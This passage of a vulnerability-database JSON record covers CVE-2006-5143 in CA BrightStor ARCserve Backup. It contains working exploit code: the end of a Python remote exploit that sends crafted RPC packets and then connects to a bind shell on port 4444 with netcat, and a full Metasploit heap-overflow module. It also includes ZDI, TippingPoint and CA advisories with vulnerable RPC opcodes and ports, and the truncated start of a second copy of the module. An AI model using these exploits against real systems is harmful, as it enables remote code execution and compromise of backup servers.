hex(ord(port2))\r\n port3 = hex(ord(port3))\r\n port4 = hex(ord(port4))\r\n port = '%02x%02x%02x%02x' % (int(port1,16),int(port2,16),int(port3,16),int(port4,16))\r\n \r\n port = int(port,16)\r\n if port < 1100:\r\n print '[+] Fresh Meat: Mediasvr.exe has not been restarted, Sending Packet 1 to: Target: %s Port: %s' %(target,port)\r\n ExploitMediaSvr(target,port,1)\r\n else:\r\n print '[+] Mediasvr.exe has been restarted, Sending Packet 2 to: Target: %s Port: %s' % (target,port)\r\n ExploitMediaSvr(target,port,2)\r\n\r\ndef ExploitMediaSvr(target,port,p):\r\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n sock.connect((target, port))\r\n if p == 1:\r\n sock.send(rpc_packet1) \r\n elif p == 2:\r\n sock.send(rpc_packet2)\r\n sock.close ()\r\n\r\n\r\nif __name__==\"__main__\":\r\n try:\r\n target = sys.argv[1]\r\n except IndexError:\r\n print '[+] Computer Associates (CA) Brightstor Backup Mediasvr.exe Remote Exploit'\r\n print '[+] Author: Shirkdog'\r\n print '[+] Usage: %s <target ip>\\n' % sys.argv[0]\r\n sys.exit(-1)\r\n\r\n print '[+] Computer Associates (CA) Brightstor Backup Mediasvr.exe Remote Exploit'\r\n print '[+] Author: Shirkdog'\r\n\r\n GetMediaSvrPort(target)\r\n \r\n print '[+] Exploit sent. Using nc to connect to: %s on port 4444' % target\r\n time.sleep(3)\r\n connect = \"/usr/bin/nc -vn \" + target + \" 4444\"\r\n os.system(connect)\r\n\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/28766/"}, {"lastseen": "2016-02-01T23:47:12", "description": "CA BrightStor ARCserve Message Engine Heap Overflow. CVE-2006-5143. Remote exploit for windows platform", "published": "2010-04-30T00:00:00", "type": "exploitdb", "title": "CA BrightStor ARCserve Message Engine Heap Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-5143"], "modified": "2010-04-30T00:00:00", "id": "EDB-ID:16401", "href": "https://www.exploit-db.com/exploits/16401/", "sourceData": "##\r\n# $Id: message_engine_heap.rb 9179 2010-04-30 08:40:19Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = AverageRanking\r\n\r\n\tinclude Msf::Exploit::Remote::DCERPC\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'CA BrightStor ARCserve Message Engine Heap Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a heap overflow in Computer Associates BrightStor ARCserve Backup\r\n\t\t\t\t11.5. By sending a specially crafted RPC request, an attacker could overflow the\r\n\t\t\t\tbuffer and execute arbitrary code.\r\n\t\t\t},\r\n\t\t\t'Author' => [ 'MC' ],\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Version' => '$Revision: 9179 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2006-5143' ],\r\n\t\t\t\t\t[ 'OSVDB', '29533' ],\r\n\t\t\t\t\t[ 'BID', '20365' ],\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => true,\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'process',\r\n\t\t\t\t},\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 800,\r\n\t\t\t\t\t'BadChars' => \"\\x00\\x0a\\x0d\\x5c\\x5f\\x2f\\x2e\",\r\n\t\t\t\t\t'StackAdjustment' => -3500,\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t['Windows 2000 SP4 English', { 'Ret' => 0x7c2f6cc8, 'UEF' => 0x7c54144c } ],\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'Oct 05 2006',\r\n\t\t\t'DefaultTarget' => 0))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOpt::RPORT(6503)\r\n\t\t\t], self.class)\r\n\tend\r\n\r\n\tdef exploit\r\n\t\tconnect\r\n\r\n\t\thandle = dcerpc_handle('dc246bf0-7a7a-11ce-9f88-00805fe43838', '1.0', 'ncacn_ip_tcp', [datastore['RPORT']])\r\n\t\tprint_status(\"Binding to #{handle} ...\")\r\n\r\n\t\tdcerpc_bind(handle)\r\n\t\tprint_status(\"Bound to #{handle} ...\")\r\n\r\n\t\t# straight forward heap stuffz\r\n\t\tsploit = make_nops(680) + \"\\xeb\\x0a\" + make_nops(2) + [ target.ret ].pack('V')\r\n\t\tsploit << [ target['UEF'] ].pack('V') + payload.encoded\r\n\r\n\t\tprint_status(\"Trying target #{target.name}...\")\r\n\r\n\t\t\tbegin\r\n\t\t\t\tdcerpc_call(43, sploit)\r\n\t\t\t\trescue Rex::Proto::DCERPC::Exceptions::NoResponse\r\n\t\t\tend\r\n\r\n\t\thandler\r\n\t\tdisconnect\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/16401/"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:19", "bulletinFamily": "software", "cvelist": ["CVE-2006-5143"], "description": "ZDI-06-031: CA Multiple Product Message Engine RPC Server Code \r\n Execution Vulnerability\r\nhttp://www.zerodayinitiative.com/advisories/ZDI-06-031.html\r\nOctober 5, 2006\r\n\r\n-- CVE ID:\r\nCVE-2006-5143\r\n\r\n-- Affected Vendor:\r\nComputer Associates\r\n\r\n-- Affected Products:\r\nBrightStor ARCserve Backup R11.5 Server\r\nBrightStor Enterprise Backup 10.5\r\nBrightStor ARCserve Backup v9.01\r\nCA Server Protection Suite r2\r\nCA Business Protection Suite r2\r\n\r\n-- TippingPoint&#40;TM&#41; IPS Customer Protection:\r\nTippingPoint IPS customers have been protected against this\r\nvulnerability since April 11, 2006 by Digital Vaccine protection\r\nfilter ID 4295, 4348. For further product information on the TippingPoint \r\nIPS:\r\n\r\n http://www.tippingpoint.com \r\n\r\n-- Vulnerability Details:\r\nThis vulnerability allows remote attackers to execute arbitrary code on\r\nvulnerable installations of Computer Associates BrightStor ARCserve\r\nBackup, Enterprise Backup, Server Protection Suite and Business\r\nProtection Suite. Authentication is not required to exploit this\r\nvulnerability.\r\n\r\nThe problem specifically exists within ASCORE.dll, a DLL used by the\r\nMessage Engine RPC server. This service exposes a heap overflow\r\nvulnerability through RPC opcode 43 &#40;0x2b&#41; and a stack overflow\r\nvulnerability through RPC opcode 45 &#40;0x2d&#41; on TCP port 6503 endpoint\r\nwith ID dc246bf0-7a7a-11ce-9f88-00805fe43838. The flaws are exposed\r\nwhen passing long strings as the second parameter to either opcode.\r\n\r\n-- Vendor Response:\r\nComputer Associates has issued an update to correct this vulnerability.\r\nMore details can be found at:\r\n\r\n \r\nhttp://supportconnectw.ca.com/public/storage/infodocs/basbr-secnotice.asp\r\n\r\n-- Disclosure Timeline:\r\n2006.04.07 - Vulnerability reported to vendor\r\n2006.04.11 - Digital Vaccine released to TippingPoint customers\r\n2006.10.05 - Coordinated public release of advisory\r\n\r\n-- Credit:\r\nThis vulnerability was discovered by livesploit.com.\r\n\r\n-- About the Zero Day Initiative &#40;ZDI&#41;:\r\nEstablished by TippingPoint, a division of 3Com, The Zero Day Initiative\r\n&#40;ZDI&#41; represents a best-of-breed model for rewarding security\r\nresearchers for responsibly disclosing discovered vulnerabilities.\r\n\r\nResearchers interested in getting paid for their security research\r\nthrough the ZDI can find more information and sign-up at:\r\n\r\n http://www.zerodayinitiative.com\r\n\r\nThe ZDI is unique in how the acquired vulnerability information is used.\r\n3Com does not re-sell the vulnerability details or any exploit code.\r\nInstead, upon notifying the affected product vendor, 3Com provides its\r\ncustomers with zero day protection through its intrusion prevention\r\ntechnology. Explicit details regarding the specifics of the\r\nvulnerability are not exposed to any parties until an official vendor\r\npatch is publicly available. Furthermore, with the altruistic aim of\r\nhelping to secure a broader user base, 3Com provides this vulnerability\r\ninformation confidentially to security vendors &#40;including competitors&#41;\r\nwho have a vulnerability protection or mitigation product.\r\n\r\n_______________________________________________\r\nFull-Disclosure - We believe in it.\r\nCharter: http://lists.grok.org.uk/full-disclosure-charter.html\r\nHosted and sponsored by Secunia - http://secunia.com/", "edition": 1, "modified": "2006-10-06T00:00:00", "published": "2006-10-06T00:00:00", "id": "SECURITYVULNS:DOC:14567", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:14567", "title": "[Full-disclosure] ZDI-06-031: CA Multiple Product Message Engine RPC Server Code Execution Vulnerability", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:19", "bulletinFamily": "software", "cvelist": ["CVE-2006-5143"], "description": "TSRT-06-11: CA Multiple Product DBASVR RPC Server Multiple Buffer\r\n Overflow Vulnerabilities\r\nhttp://www.tippingpoint.com/security/advisories/TSRT-06-11.html\r\nOctober 5, 2006\r\n\r\n-- CVE ID:\r\nCVE-2006-5143\r\n\r\n-- Affected Vendor:\r\nComputer Associates\r\n\r\n-- Affected Products:\r\nBrightStor ARCserve Backup R11.5 Client\r\nBrightStor ARCserve Backup R11.5 Server\r\nBrightStor Enterprise Backup 10.5\r\nBrightStor ARCserve Backup v9.01\r\nCA Server Protection Suite r2\r\nCA Business Protection Suite r2\r\n\r\n-- TippingPoint&#40;TM&#41; IPS Customer Protection:\r\nTippingPoint IPS customers have been protected against this\r\nvulnerability since March 27, 2006 by Digital Vaccine protection\r\nfilter ID 4268. For further product information on the TippingPoint IPS:\r\n\r\n http://www.tippingpoint.com \r\n\r\n-- Vulnerability Details:\r\nThis vulnerability allows remote attackers to execute arbitrary code on\r\nvulnerable installations of Computer Associates BrightStor ARCserve\r\nBackup, Enterprise Backup, Server Protection Suite and Business\r\nProtection Suite. Authentication is not required to exploit this\r\nvulnerability and both client and servers are affected.\r\n\r\nThe problem specifically exists within DBASVR.exe, the Backup Agent RPC\r\nServer. This service exposes a number of vulnerable RPC routines through\r\na TCP endpoint with ID 88435ee0-861a-11ce-b86b-00001b27f656 on port\r\n6071. The most trivial of the exposed vulnerabilities results in an\r\nexploitable stack overflow.\r\n\r\nThe vulnerable routines include:\r\n\r\n /* opcode: 0x01, address: 0x00401A70 */\r\n \r\n long sub_401A70 &#40;\r\n [in][string] char * arg_1,\r\n [in][string] char * arg_2, // stack overflow\r\n [out][size_is&#40;8192&#41;, length_is&#40;*arg_4&#41;] char * arg_3,\r\n [in, out] long * arg_4\r\n &#41;;\r\n\r\n\r\n /* opcode: 0x02, address: 0x00401CC0*/\r\n \r\n long sub_401CC0 &#40;\r\n [in][string] char * arg_1,\r\n [in][string] char * arg_2, // stack overflow\r\n [in][string] char * arg_3,\r\n [out] long * arg_4\r\n &#41;;\r\n\r\n\r\n /* opcode: 0x18, address: 0x004041C0*/\r\n \r\n long sub_4041C0 &#40;\r\n [in][string] char * arg_1,\r\n [in][string] char * arg_2, // stack overflow\r\n [out] long * arg_3\r\n &#41;;\r\n\r\nThe first two vulnerable subroutines are the result of inline\r\nstrcpy&#40;&#41;/memcpy&#40;&#41;&#39;s. The third vulnerable subroutine is due to an\r\ninsecure call to lstrcat&#40;&#41;.\r\n\r\n-- Vendor Response:\r\nComputer Associates has issued an update to correct this vulnerability.\r\nMore details can be found at:\r\n \r\n supportconnectw.ca.com/public/storage/infodocs/basbr-secnotice.asp\r\n\r\n-- Disclosure Timeline:\r\n2006.03.27 - Digital Vaccine released to TippingPoint customers\r\n2006.03.28 - Vulnerability reported to vendor\r\n2006.10.05 - Coordinated public release of advisory\r\n\r\n-- Credit:\r\nThis vulnerability was discovered by Pedram Amini, TippingPoint Security\r\nResearch Team.\r\n\r\n_______________________________________________\r\nFull-Disclosure - We believe in it.\r\nCharter: http://lists.grok.org.uk/full-disclosure-charter.html\r\nHosted and sponsored by Secunia - http://secunia.com/", "edition": 1, "modified": "2006-10-06T00:00:00", "published": "2006-10-06T00:00:00", "id": "SECURITYVULNS:DOC:14569", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:14569", "title": "[Full-disclosure] TSRT-06-11: CA Multiple Product DBASVR RPC Server Multiple Buffer Overflow Vulnerabilities", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:19", "bulletinFamily": "software", "cvelist": ["CVE-2006-5143"], "description": "ZDI-06-030: CA Multiple Product Discovery Service Remote Buffer Overflow\r\n Vulnerability\r\nhttp://www.zerodayinitiative.com/advisories/ZDI-06-030.html\r\nOctober 5, 2006\r\n\r\n-- CVE ID:\r\nCVE-2006-5143\r\n\r\n-- Affected Vendor:\r\nComputer Associates\r\n\r\n-- Affected Products:\r\nBrightStor ARCserve Backup R11.5 Client\r\nBrightStor ARCserve Backup R11.5 Server\r\nBrightStor Enterprise Backup 10.5\r\nBrightStor ARCserve Backup v9.01\r\nCA Server Protection Suite r2\r\nCA Business Protection Suite r2\r\n\r\n-- TippingPoint&#40;TM&#41; IPS Customer Protection:\r\nTippingPoint IPS customers have been protected against this\r\nvulnerability since April 3, 2006 by Digital Vaccine protection\r\nfilter ID 4289. For further product information on the TippingPoint IPS:\r\n\r\n http://www.tippingpoint.com \r\n\r\n-- Vulnerability Details:\r\nThis vulnerability allows remote attackers to execute arbitrary code on\r\nvulnerable installations of Computer Associates BrightStor ARCserve\r\nBackup, Enterprise Backup, Server Protection Suite and Business\r\nProtection Suite. Authentication is not required to exploit this\r\nvulnerability and both client and servers are affected.\r\n\r\nThe problem specifically exists within the discovery service which\r\ncommunicates initially over UDP port 41524 and then over TCP port\r\n41523. Due to invalid bounds checking during TCP communications, a\r\nstack based buffer overflow may occur in ASBRDCST.DLL during a call to\r\nvsprintf&#40;&#41;.\r\n\r\n-- Vendor Response:\r\nComputer Associates has issued an update to correct this vulnerability.\r\nMore details can be found at:\r\n\r\n \r\nhttp://supportconnectw.ca.com/public/storage/infodocs/basbr-secnotice.asp\r\n\r\n-- Disclosure Timeline:\r\n2006.04.07 - Vulnerability reported to vendor\r\n2006.04.03 - Digital Vaccine released to TippingPoint customers\r\n2006.10.05 - Coordinated public release of advisory\r\n\r\n-- Credit:\r\nThis vulnerability was discovered by livesploit.com.\r\n\r\n-- About the Zero Day Initiative &#40;ZDI&#41;:\r\nEstablished by TippingPoint, a division of 3Com, The Zero Day Initiative\r\n&#40;ZDI&#41; represents a best-of-breed model for rewarding security\r\nresearchers for responsibly disclosing discovered vulnerabilities.\r\n\r\nResearchers interested in getting paid for their security research\r\nthrough the ZDI can find more information and sign-up at:\r\n\r\n http://www.zerodayinitiative.com\r\n\r\nThe ZDI is unique in how the acquired vulnerability information is used.\r\n3Com does not re-sell the vulnerability details or any exploit code.\r\nInstead, upon notifying the affected product vendor, 3Com provides its\r\ncustomers with zero day protection through its intrusion prevention\r\ntechnology. Explicit details regarding the specifics of the\r\nvulnerability are not exposed to any parties until an official vendor\r\npatch is publicly available. Furthermore, with the altruistic aim of\r\nhelping to secure a broader user base, 3Com provides this vulnerability\r\ninformation confidentially to security vendors &#40;including competitors&#41;\r\nwho have a vulnerability protection or mitigation product.\r\n\r\n_______________________________________________\r\nFull-Disclosure - We believe in it.\r\nCharter: http://lists.grok.org.uk/full-disclosure-charter.html\r\nHosted and sponsored by Secunia - http://secunia.com/", "edition": 1, "modified": "2006-10-06T00:00:00", "published": "2006-10-06T00:00:00", "id": "SECURITYVULNS:DOC:14566", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:14566", "title": "[Full-disclosure] ZDI-06-030: CA Multiple Product Discovery Service Remote Buffer Overflow Vulnerability", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:19", "bulletinFamily": "software", "cvelist": ["CVE-2006-5142", "CVE-2006-5143"], "description": "\r\nTitle: CAID 34693, 34694: CA BrightStor ARCserve Backup Multiple \r\nBuffer Overflow Vulnerabilities\r\n\r\nCA Vulnerability ID &#40;CAID&#41;: 34693, 34694\r\n\r\nCA Advisory Date: 2006-10-05\r\n\r\nDiscovered By: TippingPoint, www.zerodayinitiative.com\r\n\r\nImpact: Remote attacker can execute arbitrary code.\r\n\r\nSummary: CA BrightStor ARCserve Backup contains multiple buffer \r\noverflow conditions that allow remote attackers to execute \r\narbitrary code with local SYSTEM privileges on Windows. These \r\nissues affect the BrightStor Backup Agent Service, the Job Engine \r\nService, and the Discovery Service in multiple BrightStor ARCserve \r\nBackup application agents and the Base product.\r\n\r\nMitigating Factors: None\r\n\r\nSeverity: CA has given these vulnerabilities a High risk rating.\r\n\r\nAffected Products:\r\nBrightStor Products:\r\n- BrightStor ARCserve Backup r11.5 SP1 and below &#40;SP2 does not \r\n have this vulnerability&#41;\r\n- BrightStor ARCserve Backup r11.1\r\n- BrightStor ARCserve Backup for Windows r11\r\n- BrightStor Enterprise Backup 10.5\r\n- BrightStor ARCserve Backup v9.01 \r\nCA Protection Suites r2:\r\n- CA Server Protection Suite r2\r\n- CA Business Protection Suite r2\r\n- CA Business Protection Suite for Microsoft Small Business Server \r\n Standard Edition r2\r\n- CA Business Protection Suite for Microsoft Small Business Server \r\n Premium Edition r2\r\n\r\nAffected platforms:\r\nMicrosoft Windows\r\n\r\nStatus and Recommendation: \r\nCustomers with vulnerable versions of the BrightStor ARCserve \r\nBackup products should upgrade to the latest versions which are \r\navailable for download from http://supportconnect.ca.com.\r\nSolution Document Reference APARs: \r\nQO82860, QO82863, QO82917, QO82856, QO82858\r\n\r\nDetermining if you are affected: \r\nFor a list of updated files, and instructions on how to verify \r\nthat the security update was fully applied, please review the \r\nInformational Solution referenced in the appropriate Solution \r\nDocument.\r\n\r\nReferences &#40;URLs may wrap&#41;: \r\nCA SupportConnect:\r\nhttp://supportconnect.ca.com/\r\nCA SupportConnect Security Notice for this vulnerability:\r\nImportant Security Notice for BrightStor ARCserve Backup &#40;Buffer \r\nOverrun&#41;\r\nhttp://supportconnectw.ca.com/public/storage/infodocs/basbr-secnotice.asp\r\nSolution Document Reference APARs: \r\nQO82860, QO82863, QO82917, QO82856, QO82858\r\nCA Security Advisor Research Blog posting:\r\nhttp://www3.ca.com/securityadvisor/blogs/posting.aspx?id=90744&amp;pid=93686\r\nCAID: 34693, 34694\r\nCAID Advisory links: \r\nhttp://www3.ca.com/securityadvisor/vulninfo/vuln.aspx?id=34693\r\nhttp://www3.ca.com/securityadvisor/vulninfo/vuln.aspx?id=34694\r\nDiscoverer: TippingPoint\r\nhttp://www.tippingpoint.com/security/advisories/TSRT-06-11.html\r\nhttp://www.tippingpoint.com/security/advisories/TSRT-06-12.html\r\nhttp://www.zerodayinitiative.com/advisories/ZDI-06-030.html\r\nhttp://www.zerodayinitiative.com/advisories/ZDI-06-031.html\r\nCVE Reference: CVE-2006-5142, CVE-2006-5143\r\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5142\r\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5143\r\nOSVDB Reference: OSVDB ID: pending\r\nhttp://osvdb.org/\r\n\r\nChangelog for this advisory:\r\nv1.0 - Initial Release\r\n\r\nCustomers who require additional information should contact CA \r\nTechnical Support at http://supportconnect.ca.com.\r\n\r\nFor technical questions or comments related to this advisory,\r\nplease send email to vuln@ca.com, or contact me directly.\r\n\r\nIf you discover a vulnerability in CA products, please report\r\nyour findings to vuln@ca.com, or utilize our &quot;Submit a \r\nVulnerability&quot; form.\r\nURL: http://www3.ca.com/securityadvisor/vulninfo/submit.aspx\r\n\r\n\r\nRegards,\r\nKen Williams ; 0xE2941985\r\nDirector, CA Vulnerability Research\r\n\r\nCA, One CA Plaza. Islandia, NY 11749\r\n \r\nContact http://www3.ca.com/contact/\r\nLegal Notice http://www3.ca.com/legal/\r\nPrivacy Policy http://www3.ca.com/privacy/\r\nCopyright \u00a9 2006 CA. All rights reserved.\r\n_______________________________________________\r\nFull-Disclosure - We believe in it.\r\nCharter: http://lists.grok.org.uk/full-disclosure-charter.html\r\nHosted and sponsored by Secunia - http://secunia.com/", "edition": 1, "modified": "2006-10-06T00:00:00", "published": "2006-10-06T00:00:00", "id": "SECURITYVULNS:DOC:14570", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:14570", "title": "[Full-disclosure] [CAID 34693, 34694]: CA BrightStor ARCserve Backup Multiple Buffer Overflow Vulnerabilities", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:19", "bulletinFamily": "software", "cvelist": ["CVE-2006-5142", "CVE-2006-5143"], "description": "Our original fixes for the BrightStor ARCserve Backup\r\n\r\nvulnerabilities that we publicly disclosed on 2006-10-05\r\n\r\n&#40;http://www3.ca.com/securityadvisor/blogs/posting.aspx?id=90744&amp;pid=9377\r\n5&amp;date=2006/10&#41;\r\n\r\ndid not completely resolve one of the vulnerabilities.\r\n\r\nConsequently, we have released new fixes that need to be applied.\r\n\r\nPlease note that these do not replace the original fixes. Both\r\n\r\nfixes &#40;each release needs two fixes&#41; need to be applied. A revised\r\n\r\nadvisory can be found below, and at this link.\r\n\r\nhttp://www3.ca.com/securityadvisor/blogs/posting.aspx?id=90744&amp;pid=94397\r\n&amp;date=2006/10\r\n\r\nTitle: CAID 34693, 34694: CA BrightStor ARCserve Backup Multiple\r\n\r\nBuffer Overflow Vulnerabilities &#40;UPDATED&#41;\r\n\r\nCA Vulnerability ID &#40;CAID&#41;: 34693, 34694\r\n\r\nCA Advisory Date: 2006-10-05\r\n\r\nCA Revised Advisory Date: 2006-10-19\r\n\r\nDiscovered By: TippingPoint, www.zerodayinitiative.com\r\n\r\nImpact: Remote attacker can execute arbitrary code.\r\n\r\nSummary: CA BrightStor ARCserve Backup contains multiple buffer\r\n\r\noverflow conditions that allow remote attackers to execute\r\n\r\narbitrary code with local SYSTEM privileges on Windows. These\r\n\r\nissues affect the BrightStor Backup Agent Service, the Job Engine\r\n\r\nService, and the Discovery Service in multiple BrightStor ARCserve\r\n\r\nBackup application agents and the Base product.\r\n\r\nMitigating Factors: None\r\n\r\nSeverity: CA has given these vulnerabilities a High risk rating.\r\n\r\nAffected Products:\r\n\r\nBrightStor Products:\r\n\r\n- BrightStor ARCserve Backup r11.5 SP1 and below &#40;SP2 does not\r\n\r\nhave this vulnerability&#41;\r\n\r\n- BrightStor ARCserve Backup r11.1\r\n\r\n- BrightStor ARCserve Backup for Windows r11\r\n\r\n- BrightStor Enterprise Backup 10.5\r\n\r\n- BrightStor ARCserve Backup v9.01\r\n\r\nCA Protection Suites r2:\r\n\r\n- CA Server Protection Suite r2\r\n\r\n- CA Business Protection Suite r2\r\n\r\n- CA Business Protection Suite for Microsoft Small Business Server\r\n\r\nStandard Edition r2\r\n\r\n- CA Business Protection Suite for Microsoft Small Business Server\r\n\r\nPremium Edition r2\r\n\r\nAffected platforms:\r\n\r\nMicrosoft Windows\r\n\r\nStatus and Recommendation:\r\n\r\nCustomers with vulnerable versions of the BrightStor ARCserve\r\n\r\nBackup products should upgrade to the latest versions which are\r\n\r\navailable for download from http://supportconnect.ca.com.\r\n\r\nSolution Document Reference APARs:\r\n\r\nQO82860, QO82863, QO82917, QO82856, QO82858\r\n\r\nThe original fixes did not completely resolve one of the\r\n\r\nvulnerabilities. Consequently, an additional fix needs to be\r\n\r\napplied. Please note that these do not replace the original fixes.\r\n\r\nBoth fixes &#40;each release needs two fixes&#41; need to be applied.\r\n\r\nSolution Document Reference APARs:\r\n\r\nQO83306, QO83307, QO83308, QO83309\r\n\r\nDetermining if you are affected:\r\n\r\nFor a list of updated files, and instructions on how to verify\r\n\r\nthat the security update was fully applied, please review the\r\n\r\nInformational Solution referenced in the appropriate Solution\r\n\r\nDocument.\r\n\r\nReferences &#40;URLs may wrap&#41;:\r\n\r\nCA SupportConnect:\r\n\r\nhttp://supportconnect.ca.com/\r\n\r\nCA SupportConnect Security Notice for this vulnerability:\r\n\r\nImportant Security Notice for BrightStor ARCserve Backup &#40;Buffer\r\n\r\nOverrun&#41;\r\n\r\nhttp://supportconnectw.ca.com/public/storage/infodocs/basbr-secnotice.as\r\np\r\n\r\nSolution Document Reference APARs:\r\n\r\nQO82860, QO82863, QO82917, QO82856, QO82858, QO83306, QO83307,\r\n\r\nQO83308, QO83309\r\n\r\nCA Security Advisor Research Blog postings:\r\n\r\nhttp://www3.ca.com/securityadvisor/blogs/posting.aspx?id=90744&amp;pid=93775\r\n&amp;date=2006/10\r\n\r\nhttp://www3.ca.com/securityadvisor/blogs/posting.aspx?id=90744&amp;pid=94397\r\n&amp;date=2006/10\r\n\r\nCAID: 34693, 34694\r\n\r\nCAID Advisory links:\r\n\r\nhttp://www3.ca.com/securityadvisor/vulninfo/vuln.aspx?id=34693\r\n\r\nhttp://www3.ca.com/securityadvisor/vulninfo/vuln.aspx?id=34694\r\n\r\nDiscoverer: TippingPoint\r\n\r\nhttp://www.tippingpoint.com/security/advisories/TSRT-06-11.html\r\n\r\nhttp://www.tippingpoint.com/security/advisories/TSRT-06-12.html\r\n\r\nhttp://www.zerodayinitiative.com/advisories/ZDI-06-030.html\r\n\r\nhttp://www.zerodayinitiative.com/advisories/ZDI-06-031.html\r\n\r\nCVE Reference: CVE-2006-5142, CVE-2006-5143\r\n\r\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5142\r\n\r\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5143\r\n\r\nOSVDB References: OSVDB IDs: 29580, 29533, 29534, 29535\r\n\r\nhttp://osvdb.org/29580\r\n\r\nhttp://osvdb.org/29533\r\n\r\nhttp://osvdb.org/29534\r\n\r\nhttp://osvdb.org/29535\r\n\r\nChangelog for this advisory:\r\n\r\nv1.0 - Initial Release\r\n\r\nv2.0 - Advisory updated: new fixes available that must be\r\n\r\ninstalled, IN ADDITION TO the original fixes, to properly\r\n\r\nresolve all of the vulnerability issues. Fixed incorrect\r\n\r\nblog link. Added OSVDB references.\r\n\r\nCustomers who require additional information should contact CA\r\n\r\nTechnical Support at http://supportconnect.ca.com.\r\n\r\nFor technical questions or comments related to this advisory,\r\n\r\nplease send email to vuln &#40;at&#41; ca &#40;dot&#41; com [email concealed], or contact me directly.\r\n\r\nIf you discover a vulnerability in CA products, please report\r\n\r\nyour findings to vuln &#40;at&#41; ca &#40;dot&#41; com [email concealed], or utilize our &quot;Submit a\r\n\r\nVulnerability&quot; form.\r\n\r\nURL: http://www3.ca.com/securityadvisor/vulninfo/submit.aspx\r\n\r\nRegards,\r\n\r\nKen Williams ; 0xE2941985\r\n\r\nDirector, CA Vulnerability Research\r\n\r\nCA, One CA Plaza. Islandia, NY 11749\r\n\r\nContact http://www3.ca.com/contact/\r\n\r\nLegal Notice http://www3.ca.com/legal/\r\n\r\nPrivacy Policy http://www3.ca.com/privacy/\r\n\r\nCopyright &#194;\u00a9 2006 CA. All rights reserved.\r\n\r\n", "edition": 1, "modified": "2006-10-21T00:00:00", "published": "2006-10-21T00:00:00", "id": "SECURITYVULNS:DOC:14773", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:14773", "title": "[CAID 34693, 34694]: CA BrightStor ARCserve Backup Multiple Buffer Overflow Vulnerabilities &#40;UPDATED&#41;", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:25:10", "description": "", "published": "2009-10-30T00:00:00", "type": "packetstorm", "title": "CA BrightStor ARCserve Message Engine Heap Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-5143"], "modified": "2009-10-30T00:00:00", "id": "PACKETSTORM:82935", "href": "https://packetstormsecurity.com/files/82935/CA-BrightStor-ARCserve-Message-Engine-Heap-Overflow.html", "sourceData": "`## \n# $Id$ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \n \nrequire 'msf/core' \n \n \nclass Metasploit3 < Msf::Exploit::Remote \n \ninclude Msf::Exploit::Remote::DCERPC \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'CA BrightStor ARCserve Message Engine Heap Overflow', \n'Description' => %q{ \nThis module exploits a heap overflow in Computer Associates BrightStor ARCserve Backup \n11.5. By sending a specially crafted RPC request, an attacker could overflow the \nbuffer and execute arbitrary code. \n}, \n'Author' => [ 'MC' ], \n'License' => MSF_LICENSE, \n'Version' => '$Revision$', \n'References' => \n[ \n[ 'CVE', '2006-5143' ], \n[ 'OSVDB', '29533' ], \n[ 'BID', '20365' ], \n], \n'Privileged' => true, \n'DefaultOptions' => \n{ \n'EXITFUNC' => 